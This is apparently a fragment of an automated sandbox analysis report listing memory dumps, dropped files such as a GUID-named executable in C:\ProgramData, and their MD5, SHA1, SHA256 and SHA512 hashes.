SHA512 201f208f52f1eb60ab221da7fef4a7988612123d865eb02cb989073458571785e4e4ece44b2ac95268e177482bdf05c6e435136aee7d71fe0fbb048ef2fcf899

memory/4668-269-0x0000016E27E60000-0x0000016E27EB0000-memory.dmp

memory/4668-270-0x0000016E27E30000-0x0000016E27E4E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5efef7b8b6534cf61adc5a223225b92f
SHA1 21c44e23f5b504a2c89e081fd6464bc68007ed0a
SHA256 ceb1979a91fa6d97a1ebb6162d01f30d9b9527d1ba93e9dc60165cbfd3d98886
SHA512 efc60add9ea6f0f08f824d4a3d5413b8cd50f25274687fdfa466699ab49ac4504005e5b130d2149319960c636ff748e2d1f805bae168d3ef517a84bda7c2e9b7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 640e1e8914a9e4045d7c9331510cd65e
SHA1 20dbf3777f4ec696c45304b7e8b1f4ea62bcd9b8
SHA256 3d90b754303986173f9e70e82f3d71c453cc3dd8c9effc766bf55004909078d8
SHA512 373d84331d97e407a6ce56bae77231b15a1747c9839a27932715c2b9f81cacc41091e9d735faf0df9f228d851be402691dbeb5cf1b5807c075f996d43a723690

memory/4668-334-0x0000016E27E50000-0x0000016E27E5A000-memory.dmp

memory/4668-335-0x0000016E40620000-0x0000016E40632000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73af5a2e56e321b85f04f1c431f760ea
SHA1 4ffd2aecfe9163cebacf508be261133262d675f9
SHA256 5d53260071efea7c61647a6be8c386cd9d4651f92a5d4bd7b0ac8dc72a8f85eb
SHA512 0926185823796cc35b263ded5e30d92525453945df09bc34c1dee646d637deded9d6e15a750748f2948ddce4714f17a64da9899fda14f0feb8746b87428ec8b2

C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

MD5 499e35df562563babfff6a1d2ee71743
SHA1 7bece5115d9df1fa43b6a7a69f9574a498388960
SHA256 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
SHA512 2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc